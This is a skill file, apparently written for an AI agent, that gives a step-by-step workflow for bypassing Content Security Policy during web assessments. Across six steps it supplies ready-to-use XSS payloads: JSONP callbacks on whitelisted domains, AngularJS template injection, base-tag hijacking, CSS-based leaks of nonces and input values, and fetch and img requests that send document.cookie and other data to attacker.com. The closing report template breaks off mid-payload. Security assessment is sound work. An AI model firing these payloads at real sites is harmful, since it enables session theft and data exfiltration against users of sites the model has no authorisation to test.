performing-content-security-policy-bypass

What this skill does

# Performing Content Security Policy Bypass

## When to Use
- When XSS is found but execution is blocked by Content Security Policy
- During web application security assessments to evaluate CSP effectiveness
- When testing the robustness of CSP against known bypass techniques
- During bug bounty hunting where CSP prevents direct XSS exploitation
- When auditing CSP header configuration for security weaknesses

## Prerequisites
- Burp Suite for intercepting responses and analyzing CSP headers
- CSP Evaluator (Google) for automated policy analysis
- Understanding of CSP directives (script-src, default-src, style-src, etc.)
- Knowledge of CSP bypass techniques (JSONP, base-uri, object-src)
- Browser developer tools for CSP violation monitoring
- Collection of whitelisted domain JSONP endpoints

## Workflow

### Step 1 — Analyze the CSP Policy
```bash
# Extract CSP from response headers
curl -sI http://target.com | grep -i "content-security-policy"

# Check for CSP in meta tags
curl -s http://target.com | grep -i "content-security-policy"

# Analyze CSP with Google CSP Evaluator
# Visit: https://csp-evaluator.withgoogle.com/
# Paste the CSP policy for automated analysis

# Check for report-only mode (not enforced)
curl -sI http://target.com | grep -i "content-security-policy-report-only"
# If only report-only exists, CSP is NOT enforced - XSS works directly

# Parse directive values
# Example CSP:
# script-src 'self' 'unsafe-inline' https://cdn.example.com;
# default-src 'self'; style-src 'self' 'unsafe-inline';
# img-src *; connect-src 'self'
```

### Step 2 — Exploit unsafe-inline and unsafe-eval
```bash
# If script-src includes 'unsafe-inline':
# CSP is effectively bypassed for inline scripts
<script>alert(document.domain)</script>
<img src=x onerror="alert(1)">

# If script-src includes 'unsafe-eval':
# eval() and related functions work
<script>eval('alert(1)')</script>
<script>setTimeout('alert(1)',0)</script>
<script>new Function('alert(1)')()</script>

# If 'unsafe-inline' with nonce:
# unsafe-inline is ignored when nonce is present (CSP3)
# Focus on nonce leaking instead
```

### Step 3 — Exploit Whitelisted Domain JSONP Endpoints
```bash
# If CSP whitelists a domain with JSONP endpoints:
# script-src 'self' https://accounts.google.com

# Find JSONP endpoints on whitelisted domains
# Google:
<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)"></script>

# Common JSONP endpoints:
# https://www.google.com/complete/search?client=chrome&q=test&callback=alert(1)//
# https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.0/angular.min.js

# If AngularJS is whitelisted (CDN):
# script-src includes cdnjs.cloudflare.com or ajax.googleapis.com
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.0/angular.min.js"></script>
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>

# Exploit JSONP on whitelisted APIs
<script src="https://whitelisted-api.com/endpoint?callback=alert(1)//">
</script>
```

### Step 4 — Exploit base-uri and Form Action Bypasses
```bash
# If base-uri is not restricted:
# Inject <base> tag to redirect relative script loads
<base href="https://attacker.com/">
# All relative script src will load from attacker.com

# If form-action is not restricted:
# Steal data via form submission
<form action="https://attacker.com/steal" method="POST">
  <input name="csrf_token" value="">
</form>
<script>document.forms[0].submit()</script>

# If object-src is not restricted:
# Use Flash or plugin-based XSS
<object data="https://attacker.com/exploit.swf"></object>
<embed src="https://attacker.com/exploit.swf">
```

### Step 5 — Exploit Nonce and Hash Bypasses
```bash
# Nonce leaking via CSS attribute selectors
# If attacker can inject HTML (but not script due to CSP nonce):
<style>
  script[nonce^="a"] { background: url("https://attacker.com/leak?nonce=a"); }
  script[nonce^="b"] { background: url("https://attacker.com/leak?nonce=b"); }
</style>
# Brute-force each character position to leak the nonce

# Nonce reuse detection
# If the same nonce is used across multiple pages or requests:
# Capture nonce from one page, use it to inject script on another

# DOM clobbering to override nonce checking
<form id="csp"><input name="nonce" value="attacker-controlled"></form>

# Script gadgets in whitelisted libraries
# If a whitelisted JS library has a gadget that creates scripts:
# jQuery: $.getScript(), $.globalEval()
# Lodash: _.template()
# DOMPurify bypass via prototype pollution

# Policy injection via reflected parameters
# If CSP header reflects user input:
# Inject: ;script-src 'unsafe-inline'
# Or inject: ;report-uri /csp-report;script-src-elem 'unsafe-inline'
```

### Step 6 — Exploit Data Exfiltration Without script-src
```bash
# Even without script execution, data exfiltration is possible:

# Via img-src (if allows external):
<img src="https://attacker.com/steal?data=SENSITIVE_DATA">

# Via CSS injection (if style-src allows unsafe-inline):
<style>
input[value^="a"] { background: url("https://attacker.com/?char=a"); }
input[value^="b"] { background: url("https://attacker.com/?char=b"); }
</style>

# Via connect-src (if allows external):
<script nonce="valid">
  fetch('https://attacker.com/steal?data=' + document.cookie);
</script>

# Via DNS prefetch:
<link rel="dns-prefetch" href="//data.attacker.com">

# Via WebRTC (if not blocked):
# WebRTC can leak data through STUN/TURN servers
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| unsafe-inline | CSP directive allowing inline script execution, defeating XSS protection |
| Nonce-based CSP | Using random nonces to allow specific scripts while blocking injected ones |
| JSONP Bypass | Exploiting JSONP endpoints on whitelisted domains to execute attacker callbacks |
| Policy Injection | Injecting CSP directives through reflected user input in headers |
| base-uri Hijacking | Redirecting relative script loads by injecting a base element |
| Script Gadgets | Legitimate library features that can be abused to bypass CSP |
| CSP Report-Only | Non-enforcing CSP mode that only logs violations without blocking |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| CSP Evaluator | Google tool for analyzing CSP policy weaknesses |
| Burp Suite | HTTP proxy for CSP header analysis and bypass testing |
| CSP Scanner | Browser extension for identifying CSP bypass opportunities |
| csp-bypass | Curated list of CSP bypass techniques and payloads |
| RetireJS | Identify vulnerable JavaScript libraries on whitelisted CDNs |
| DOM Invader | Burp tool for testing CSP bypasses through DOM manipulation |

## Common Scenarios

1. **JSONP Callback XSS** — Exploit JSONP endpoints on whitelisted CDN domains to execute JavaScript callbacks containing XSS payloads
2. **AngularJS Sandbox Escape** — Load AngularJS from whitelisted CDN and use template injection to bypass CSP script restrictions
3. **Nonce Leakage** — Extract CSP nonce values through CSS injection or DOM clobbering to inject scripts with valid nonces
4. **Base URI Hijacking** — Inject base element to redirect all relative script loads to attacker-controlled server
5. **Report-Only Exploitation** — Identify CSP in report-only mode where violations are logged but not blocked, enabling direct XSS

## Output Format

```
## CSP Bypass Assessment Report
- **Target**: http://target.com
- **CSP Mode**: Enforced
- **Policy**: script-src 'self' https://cdn.jsdelivr.net; default-src 'self'

### CSP Analysis
| Directive | Value | Risk |
|-----------|-------|------|
| script-src | 'self' cdn.jsdelivr.net | JSONP/Library bypass possible |
| default-src | 'self' | Moderate |
| base-uri | Not set | base-uri hijacking possible |
| object-src | Not set (falls back to default-src) | Low |

### Bypass Techniques Found
| # | Technique | Payload | Impact |
|---|-----------|---------|--------|
| 1 | AngularJS via CDN | Load angular.min.js + template injection | Full XSS |
| 2 | Missing base-uri | <base href=